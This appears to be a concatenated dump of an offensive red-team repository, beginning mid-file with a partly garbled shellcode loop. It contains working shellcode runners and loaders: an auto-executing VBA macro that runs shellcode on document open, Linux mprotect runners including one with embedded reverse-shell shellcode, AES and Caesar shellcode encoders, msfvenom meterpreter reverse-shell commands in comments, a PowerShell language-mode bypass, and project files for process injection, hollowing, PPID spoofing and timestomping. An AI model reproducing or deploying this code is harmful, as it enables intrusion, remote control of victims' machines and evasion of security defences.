19 | // Xor encryption value has to match the loader one
20 | char xor_key = 'J';
21 | int payload_length = (int) sizeof(buf);
22 |
23 | for (int i=0; i" % sys.argv[0])
32 | sys.exit()
33 |
34 | ciphertext = aesenc(plaintext, KEY)
35 |
36 | open("rcdata1.bin", "wb").write(ciphertext)
37 | print("Shellcode saved to rcdata1.bin")
38 |
39 | print('unsigned char key[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };')
40 | print('unsigned char shellcode[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
41 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/LangBypass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Management.Automation.Runspaces;
7 | using System.Management.Automation;
8 |
9 | namespace PSLangBypass
10 | {
11 | class LangBypass
12 | {
13 | static void Main(string[] args)
14 | {
15 | // Creating the runspace and opening it
16 | Runspace rs = RunspaceFactory.CreateRunspace();
17 | // Creating powershell object
18 | PowerShell ps = PowerShell.Create();
19 |
20 | rs.Open();
21 |
22 | // Getting the LanguageMode of current session and saving to a file
23 | String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Windows\\Tasks\\test.txt";
24 |
25 | // Initialising the runspace
26 | ps.Runspace = rs;
27 |
28 | // Running the command above
29 | ps.AddScript(cmd);
30 | ps.Invoke();
31 |
32 | // Closing runspace
33 | rs.Close();
34 | }
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/ProcDump/ProcDump.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcDump", "ProcDump\ProcDump.csproj", "{538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Release|Any CPU.ActiveCfg = Release|x64
17 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Release|Any CPU.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {22F4A8F7-6204-41B4-B81F-1D30BE9EA9B7}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/VisualBasic/vba_shellcode_runner.vb:
--------------------------------------------------------------------------------
1 | Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
2 | Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
3 | Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
4 |
5 | Function mymacro()
6 | Dim buf As Variant
7 | Dim addr As LongPtr
8 | Dim counter As Long
9 | Dim data As Long
10 | Dim res As LongPtr
11 |
12 | buf = Array()
13 |
14 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
15 | For counter = LBound(buf) To UBound(buf)
16 | data = buf(counter)
17 | res = RtlMoveMemory(addr + counter, data, 1)
18 | Next counter
19 |
20 | res = CreateThread(0, 0, addr, 0, 0, 0)
21 | End Function
22 |
23 |
24 | Sub Document_Open()
25 | mymacro()
26 | End Sub
27 |
28 | Sub AutoOpen()
29 | mymacro()
30 | End Sub
--------------------------------------------------------------------------------
/C++/EarlyBird/EarlyBird.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/C++/SystemFunction032_RC4/SystemFunction032_RC4.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/PrintSpooferNET/PrintSpooferNET.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PrintSpooferNET", "PrintSpooferNET\PrintSpooferNET.csproj", "{CE5EB36F-4310-42B2-BD11-8E5C48FACB86}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Release|Any CPU.ActiveCfg = Release|x64
17 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Release|Any CPU.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {8A2ADB12-01D9-4CF9-9430-36DBD43AFC6C}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/C++/Reflective_DLLs/ReflectiveLoader/ReflectiveLoader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/C++/MapViewSection_Injection/MapViewSection_Injection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/Service1.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace Shell_Service
2 | {
3 | partial class Service1
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Component Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | components = new System.ComponentModel.Container();
32 | this.ServiceName = "Service1";
33 | }
34 |
35 | #endregion
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/xor_mprotect_shellrunner.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | // randomly placed newlines for further obfuscation
8 | //
9 | // Compile: gcc runner.c -o runner -z execstack
10 | //
11 | //Shellcode goes here
12 | // msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=? lport=443 -f c
13 | unsigned char buf[] = "";
14 |
15 | int main(int argc, char **argv)
16 | {
17 | printf("[*] Executing shellcode...\n");
18 |
19 | //Decryption below
20 | char key = 'P';
21 | int arraysize = (int) sizeof(buf);
22 |
23 | for (int i = 0; i < arraysize - 1; i++)
24 | {
25 | buf[i] = buf[i] ^ key;
26 | }
27 |
28 | printf("[*] Checking for forked process...\n");
29 | printf("\n");
30 |
31 | if (fork()== 0)
32 | {
33 | intptr_t pagesize = sysconf(_SC_PAGESIZE);
34 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
35 | pagesize, PROT_READ|PROT_EXEC)) {
36 | perror("mprotect");
37 | return -1;
38 | }
39 | printf("\n");
40 |
41 | int (*ret)() = (int(*)())buf;
42 | ret();
43 | printf("\n");
44 | } else {
45 | printf("[*] Returning from function... \n");
46 | //return 0;
47 | }
48 | printf("\n");
49 | return 3;
50 | }
51 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_VBA_Caesar/SCBuilder_VBA_Caesar.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
4 | namespace ShellcodeBuilder_VBA_Caesar
5 | {
6 | class SCBuilder_VBA_Caesar
7 | {
8 | static void Main(string[] args)
9 | {
10 |
11 | // Shellcode
12 | // msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.0.128 LPORT=443 -f csharp
13 | // Here
14 |
15 |
16 | byte[] encoded = new byte[buf.Length];
17 | for (int i = 0; i < buf.Length; i++)
18 | {
19 | encoded[i] = (byte)(((uint)buf[i] + 31) & 0xFF);
20 | }
21 |
22 | uint counter = 0;
23 |
24 | StringBuilder hex = new StringBuilder(encoded.Length * 2);
25 | foreach (byte b in encoded)
26 | {
27 | hex.AppendFormat("{0:D}, ", b);
28 | counter++;
29 | if (counter % 50 == 0)
30 | {
31 | hex.AppendFormat("_{0}", Environment.NewLine);
32 | }
33 | }
34 |
35 | Console.WriteLine("[+] Length of new payload: " + buf.Length);
36 | Console.WriteLine("[+] Payload: \n" + hex.ToString());
37 | }
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/C++/Heaven's_Gate/Heaven's_Gate.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/C++/HalosGate/prototypes.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include "structs.h"
4 |
5 | /*--------------------------------------------------------------------
6 | VX Tables
7 | --------------------------------------------------------------------*/
8 | typedef struct _VX_TABLE_ENTRY {
9 | PVOID pAddress;
10 | DWORD64 dwHash;
11 | WORD wSystemCall;
12 | } VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
13 |
14 | typedef struct _VX_TABLE {
15 | VX_TABLE_ENTRY NtAllocateVirtualMemory;
16 | VX_TABLE_ENTRY NtProtectVirtualMemory;
17 | VX_TABLE_ENTRY NtCreateThreadEx;
18 | VX_TABLE_ENTRY NtWaitForSingleObject;
19 | } VX_TABLE, * PVX_TABLE;
20 |
21 | /*--------------------------------------------------------------------
22 | Function prototypes.
23 | --------------------------------------------------------------------*/
24 | PTEB RtlGetThreadEnvironmentBlock();
25 | BOOL GetImageExportDirectory(
26 | _In_ PVOID pModuleBase,
27 | _Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
28 | );
29 | BOOL GetVxTableEntry(
30 | _In_ PVOID pModuleBase,
31 | _In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
32 | _In_ PVX_TABLE_ENTRY pVxTableEntry
33 | );
34 | BOOL Payload(
35 | _In_ PVX_TABLE pVxTable
36 | );
37 | PVOID VxMoveMemory(
38 | _Inout_ PVOID dest,
39 | _In_ const PVOID src,
40 | _In_ SIZE_T len
41 | );
--------------------------------------------------------------------------------
/C++/HellsGate/HellsGate/HellsGate.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Source Files
30 |
31 |
32 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/HookExe/HookExe.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/C++/PPID-Spoofing/PPID-Spoofing.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/C++/NT_Shellcoderunner/NT_Shellcoderunner.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/C++/HalosGate/HalosGate.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 |
31 |
32 | Source Files
33 |
34 |
35 |
--------------------------------------------------------------------------------
/C++/API_Hooking/UnHook-Ntdll-Exec/UnHook-Ntdll-Exec.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/shellcode_loader_mprotect.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include //for mprotect #include
3 | #include
4 | #include
5 | #include
6 |
7 | //Shellcode
8 | unsigned char buf[] = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
9 | "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
10 | "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
11 | "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x01\xbb\xc0\xa8"
12 | "\x31\x78\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
13 | "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
14 | "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
15 | "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
16 | "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
17 |
18 | int main() {
19 | printf("I love programming.");
20 | if(fork() == 0) {
21 | intptr_t pagesize = sysconf(_SC_PAGESIZE);
22 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
23 | pagesize, PROT_READ|PROT_EXEC)) {
24 | perror("mprotect");
25 | return -1;
26 | }
27 |
28 | int (*ret)() = (int(*)())buf;
29 | ret();
30 | } else {
31 | printf("[HAX0R] returning from function... \n");
32 | }
33 | return 3;
34 | }
35 |
--------------------------------------------------------------------------------
/C++/Reflective_DLLs/ReflectiveLoader_DLL/ReflectiveLoader_DLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/C++/Timestomp/Timestomp.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/C++/Thread_Context/Thread_Context.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/C++/Shellcode_Launcher/Shellcode_Launcher.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/C++/AES_Process_Injection/AES_Process_Injection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Resource Files
30 |
31 |
32 |
33 |
34 | Resource Files
35 |
36 |
37 |
--------------------------------------------------------------------------------
/C++/HellsGate/HellsGate.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30114.105
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
17 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
18 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
19 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
20 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
21 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
22 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
23 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/CSharp/Hollow/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Hollow")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Hollow")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("93a21197-d776-4323-a095-65849134c842")]
24 |
